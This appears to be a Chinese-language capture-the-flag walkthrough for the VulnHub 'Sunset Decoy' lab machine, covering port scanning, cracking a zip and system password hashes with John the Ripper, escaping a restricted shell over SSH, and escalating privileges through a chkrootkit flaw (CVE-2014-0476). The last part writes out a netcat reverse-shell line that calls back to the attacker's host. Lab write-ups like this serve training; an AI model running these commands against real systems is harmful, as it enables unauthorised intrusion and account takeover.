考点:暴力穷举,chkrootkit,rbash绕过
靶机链接:https://www.vulnhub.com/entry/sunset-decoy,505/
环境配置
| 名称 | IP |
|---|---|
| Kali Linux | 10.0.2.15 |
| SUNSET DECOY | 10.0.2.13 |
初步打点
端口扫描
$ export rip=10.0.2.13
$ sudo nmap -v -A -p- $rip
Scanning localhost (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
WEB测试
查看80端口,下载save.zip
$ zip2john save.zip >>save.txt
$ john save.txt --wordlist /usr/share/wordlists/rockyou.txt
得到zip压缩包密码manuel
解压缩得到一些文件
漏洞发现
尝试暴力破解系统密码
$ unshadow passwd shadow >pass.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
获得权限
靶机测试
成功获得一个用户的密码
现在登陆上去是rbash
使用参数获得bash
$ ssh [email protected] -t "bash -noprofile"
提权
chkrootkit
发现chkrootkit,尝试已存在漏洞CVE-2014-0476
$ cd /tmp
$ echo "/usr/bin/nc 10.0.2.15 444 -e /bin/sh" > update
$ bash update
